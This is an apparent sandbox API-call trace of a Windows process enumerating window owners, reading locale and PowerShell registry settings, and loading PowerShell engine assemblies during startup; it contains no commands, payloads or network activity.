	[0132.095] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x688
	[0132.095] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x6c0
	[0132.095] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x408
	[0132.095] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x7d4
	[0132.095] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x544
	[0132.095] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x540
	[0132.096] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x71c
	[0132.096] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x31c
	[0132.096] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x7ec
	[0132.096] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x5b8
	[0132.096] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x754
	[0132.096] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x664
	[0132.096] GetWindowThreadProcessId (in: hWnd=0x2017a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x640
	[0132.096] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x700
	[0132.096] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x410
	[0132.096] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x7a0
	[0132.096] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x3b4
	[0132.097] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x5cc
	[0132.097] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x5d4
	[0132.097] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x7c0
	[0132.097] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x364
	[0132.097] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x240
	[0132.097] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x560
	[0132.097] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x57c
	[0132.097] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x7b0
	[0132.097] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x6a4
	[0132.097] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x32c
	[0132.098] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x670
	[0132.098] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x50c
	[0132.098] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x514
	[0132.098] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4f0
	[0132.098] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x58c
	[0132.098] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x458
	[0132.098] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4f4
	[0132.098] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x794
	[0132.098] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x458
	[0132.098] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x778
	[0132.103] WerSetFlags () returned 0x0
	[0132.111] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0132.112] CoTaskMemFree (pv=0x0) 
	[0132.113] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1cdae8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1cdae0 | out: pulNumLanguages=0x1cdae8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1cdae0) returned 1
	[0132.113] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1cdae8, pwszLanguagesBuffer=0x2d17948, pcchLanguagesBuffer=0x1cdae0 | out: pulNumLanguages=0x1cdae8, pwszLanguagesBuffer=0x2d17948, pcchLanguagesBuffer=0x1cdae0) returned 1
	[0132.219] CoTaskMemAlloc (cb=0x24) returned 0x3e3100
	[0132.220] GetUserDefaultLocaleName (in: lpLocaleName=0x3e3100, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0132.220] CoTaskMemFree (pv=0x3e3100) 
	[0132.244] CoTaskMemAlloc (cb=0x104) returned 0x3da7b0
	[0132.244] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da7b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.244] CoTaskMemFree (pv=0x3da7b0) 
	[0132.246] CoTaskMemAlloc (cb=0x104) returned 0x3da7b0
	[0132.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da7b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.246] CoTaskMemFree (pv=0x3da7b0) 
	[0132.248] CoTaskMemAlloc (cb=0x104) returned 0x3da7b0
	[0132.248] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da7b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.248] CoTaskMemFree (pv=0x3da7b0) 
	[0132.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0132.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0132.360] SetErrorMode (uMode=0x1) returned 0x1
	[0132.360] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cd760 | out: lpFileInformation=0x1cd760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0132.360] SetErrorMode (uMode=0x1) returned 0x1
	[0132.360] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1cd9d0 | out: lpdwHandle=0x1cd9d0) returned 0x94c
	[0132.361] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d1b1d8 | out: lpData=0x2d1b1d8) returned 1
	[0132.363] VerQueryValueW (in: pBlock=0x2d1b1d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cd948, puLen=0x1cd940 | out: lplpBuffer=0x1cd948*=0x2d1b274, puLen=0x1cd940) returned 1
	[0132.363] VerQueryValueW (in: pBlock=0x2d1b1d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cd8b8, puLen=0x1cd8b0 | out: lplpBuffer=0x1cd8b8*=0x2d1b350, puLen=0x1cd8b0) returned 1
	[0132.363] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0132.363] CoTaskMemAlloc (cb=0x2e) returned 0x3ecf70
	[0132.363] lstrcpyW (in: lpString1=0x3ecf70, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0132.363] CoTaskMemFree (pv=0x3ecf70) 
	[0132.363] VerQueryValueW (in: pBlock=0x2d1b1d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cd8b8, puLen=0x1cd8b0 | out: lplpBuffer=0x1cd8b8*=0x2d1b3a4, puLen=0x1cd8b0) returned 1
	[0132.363] lstrlenW (lpString="System.Management.Automation") returned 28
	[0132.363] CoTaskMemAlloc (cb=0x3c) returned 0x3f4d20
	[0132.364] lstrcpyW (in: lpString1=0x3f4d20, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0132.364] CoTaskMemFree (pv=0x3f4d20) 
	[0132.364] VerQueryValueW (in: pBlock=0x2d1b1d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cd8b8, puLen=0x1cd8b0 | out: lplpBuffer=0x1cd8b8*=0x2d1b400, puLen=0x1cd8b0) returned 1
	[0132.364] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0132.364] CoTaskMemAlloc (cb=0x20) returned 0x3f2790
	[0132.364] lstrcpyW (in: lpString1=0x3f2790, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0132.364] CoTaskMemFree (pv=0x3f2790) 
	[0132.364] VerQueryValueW (in: pBlock=0x2d1b1d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cd8b8, puLen=0x1cd8b0 | out: lplpBuffer=0x1cd8b8*=0x2d1b440, puLen=0x1cd8b0) returned 1
	[0132.364] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0132.364] CoTaskMemAlloc (cb=0x44) returned 0x3f4d20
	[0132.364] lstrcpyW (in: lpString1=0x3f4d20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0132.364] CoTaskMemFree (pv=0x3f4d20) 
	[0132.364] VerQueryValueW (in: pBlock=0x2d1b1d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cd8b8, puLen=0x1cd8b0 | out: lplpBuffer=0x1cd8b8*=0x2d1b4a8, puLen=0x1cd8b0) returned 1
	[0132.364] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0132.365] CoTaskMemAlloc (cb=0x76) returned 0x37fca0
	[0132.365] lstrcpyW (in: lpString1=0x37fca0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0132.365] CoTaskMemFree (pv=0x37fca0) 
	[0132.365] VerQueryValueW (in: pBlock=0x2d1b1d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cd8b8, puLen=0x1cd8b0 | out: lplpBuffer=0x1cd8b8*=0x2d1b544, puLen=0x1cd8b0) returned 1
	[0132.365] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0132.365] CoTaskMemAlloc (cb=0x44) returned 0x3f4d20
	[0132.365] lstrcpyW (in: lpString1=0x3f4d20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0132.365] CoTaskMemFree (pv=0x3f4d20) 
	[0132.365] VerQueryValueW (in: pBlock=0x2d1b1d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cd8b8, puLen=0x1cd8b0 | out: lplpBuffer=0x1cd8b8*=0x2d1b5a8, puLen=0x1cd8b0) returned 1
	[0132.365] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0132.365] CoTaskMemAlloc (cb=0x58) returned 0x3381e0
	[0132.365] lstrcpyW (in: lpString1=0x3381e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0132.365] CoTaskMemFree (pv=0x3381e0) 
	[0132.365] VerQueryValueW (in: pBlock=0x2d1b1d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cd8b8, puLen=0x1cd8b0 | out: lplpBuffer=0x1cd8b8*=0x2d1b624, puLen=0x1cd8b0) returned 1
	[0132.365] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0132.365] CoTaskMemAlloc (cb=0x20) returned 0x3f2790
	[0132.365] lstrcpyW (in: lpString1=0x3f2790, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0132.365] CoTaskMemFree (pv=0x3f2790) 
	[0132.365] VerQueryValueW (in: pBlock=0x2d1b1d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cd8b8, puLen=0x1cd8b0 | out: lplpBuffer=0x1cd8b8*=0x2d1b2cc, puLen=0x1cd8b0) returned 1
	[0132.365] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0132.365] CoTaskMemAlloc (cb=0x66) returned 0x34c670
	[0132.365] lstrcpyW (in: lpString1=0x34c670, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0132.365] CoTaskMemFree (pv=0x34c670) 
	[0132.366] VerQueryValueW (in: pBlock=0x2d1b1d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cd8b8, puLen=0x1cd8b0 | out: lplpBuffer=0x1cd8b8*=0x0, puLen=0x1cd8b0) returned 0
	[0132.366] VerQueryValueW (in: pBlock=0x2d1b1d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cd8b8, puLen=0x1cd8b0 | out: lplpBuffer=0x1cd8b8*=0x0, puLen=0x1cd8b0) returned 0
	[0132.366] VerQueryValueW (in: pBlock=0x2d1b1d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cd8b8, puLen=0x1cd8b0 | out: lplpBuffer=0x1cd8b8*=0x0, puLen=0x1cd8b0) returned 0
	[0132.366] VerQueryValueW (in: pBlock=0x2d1b1d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cd888, puLen=0x1cd880 | out: lplpBuffer=0x1cd888*=0x2d1b274, puLen=0x1cd880) returned 1
	[0132.366] CoTaskMemAlloc (cb=0x204) returned 0x3e4fc0
	[0132.366] VerLanguageNameW (in: wLang=0x0, szLang=0x3e4fc0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0132.366] CoTaskMemFree (pv=0x3e4fc0) 
	[0132.366] VerQueryValueW (in: pBlock=0x2d1b1d8, lpSubBlock="\\", lplpBuffer=0x1cd8d8, puLen=0x1cd8d0 | out: lplpBuffer=0x1cd8d8*=0x2d1b200, puLen=0x1cd8d0) returned 1
	[0132.377] CoTaskMemAlloc (cb=0x104) returned 0x3da7b0
	[0132.377] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da7b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.377] CoTaskMemFree (pv=0x3da7b0) 
	[0132.397] CoTaskMemAlloc (cb=0x104) returned 0x3da7b0
	[0132.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da7b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.397] CoTaskMemFree (pv=0x3da7b0) 
	[0132.403] lstrlenW (lpString="䅁") returned 1
	[0132.515] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd7a8 | out: phkResult=0x1cd7a8*=0x31c) returned 0x0
	[0132.517] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd798 | out: phkResult=0x1cd798*=0x320) returned 0x0
	[0132.517] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd828 | out: phkResult=0x1cd828*=0x324) returned 0x0
	[0132.522] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd76c, lpData=0x0, lpcbData=0x1cd768*=0x0 | out: lpType=0x1cd76c*=0x1, lpData=0x0, lpcbData=0x1cd768*=0x56) returned 0x0
	[0132.523] CoTaskMemAlloc (cb=0x5a) returned 0x34c7c0
	[0132.523] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd73c, lpData=0x34c7c0, lpcbData=0x1cd738*=0x56 | out: lpType=0x1cd73c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd738*=0x56) returned 0x0
	[0132.523] CoTaskMemFree (pv=0x34c7c0) 
	[0132.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0132.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0132.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0132.658] CoTaskMemAlloc (cb=0x104) returned 0x3da7b0
	[0132.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da7b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.658] CoTaskMemFree (pv=0x3da7b0) 
	[0133.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0133.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0133.841] CoTaskMemAlloc (cb=0x104) returned 0x3ddc00
	[0133.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ddc00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.841] CoTaskMemFree (pv=0x3ddc00) 
	[0133.842] CoTaskMemAlloc (cb=0x104) returned 0x3ddc00
	[0133.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ddc00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.842] CoTaskMemFree (pv=0x3ddc00) 
	[0133.876] CoTaskMemAlloc (cb=0x104) returned 0x3fe8f0
	[0133.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3fe8f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.876] CoTaskMemFree (pv=0x3fe8f0) 
	[0133.878] CoTaskMemAlloc (cb=0x104) returned 0x3fe8f0
	[0133.878] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3fe8f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.878] CoTaskMemFree (pv=0x3fe8f0) 
	[0133.878] CoTaskMemAlloc (cb=0x104) returned 0x3fe8f0
	[0133.878] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3fe8f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.878] CoTaskMemFree (pv=0x3fe8f0) 
	[0134.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0134.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0134.448] CoTaskMemAlloc (cb=0x104) returned 0x3ffdc0
	[0134.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ffdc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.448] CoTaskMemFree (pv=0x3ffdc0) 
	[0134.452] CoTaskMemAlloc (cb=0x104) returned 0x3ffdc0
	[0134.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ffdc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.452] CoTaskMemFree (pv=0x3ffdc0) 
	[0134.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0134.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0136.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0136.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0137.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0137.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0137.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0137.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
